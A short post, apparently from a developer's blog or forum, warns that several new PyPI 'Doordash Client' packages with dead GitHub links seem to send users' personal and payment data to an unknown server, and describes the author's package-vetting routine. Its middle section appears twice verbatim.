I wanted to setup a slackbot to manager Doordash orders for our company.
Starting with PyPi "Doordash Client": https://pypi.org/search/?q=doordash+client I was excited by 5 recently published packages. As I usually do, I checked them out via Github... buut, hit a deadlink
Quick inspection of the package clearly shows a random server handles all the requests made including your PII, address, credit card info -- 99% chance this is malware.
World's moving fast these days, and AI is making it easier for everyone - even the bad actors - to make what looks like polish OSS.
My typical workflow selecting packages is:
1. Check out their Github - social credit means a lot to me
2. Clone the repo, and ask `claude`, `cursor` or whichever agent I'm using at the time for a quick audit
3. If I'm putting my own credentials of a PAT in there, review it myself at the top level too
Starting with PyPi "Doordash Client": https://pypi.org/search/?q=doordash+client I was excited by 5 recently published packages. As I usually do, I checked them out via Github... buut, hit a deadlink
Quick inspection of the package clearly shows a random server handles all the requests made including your PII, address, credit card info -- 99% chance this is malware.
World's moving fast these days, and AI is making it easier for everyone - even the bad actors - to make what looks like polish OSS.
My typical workflow selecting packages is:
1. Check out their Github - social credit means a lot to me
2. Clone the repo, and ask `claude`, `cursor` or whichever agent I'm using at the time for a quick audit
3. If I'm putting my own credentials of a PAT in there, review it myself at the top level too
Stay safe folks!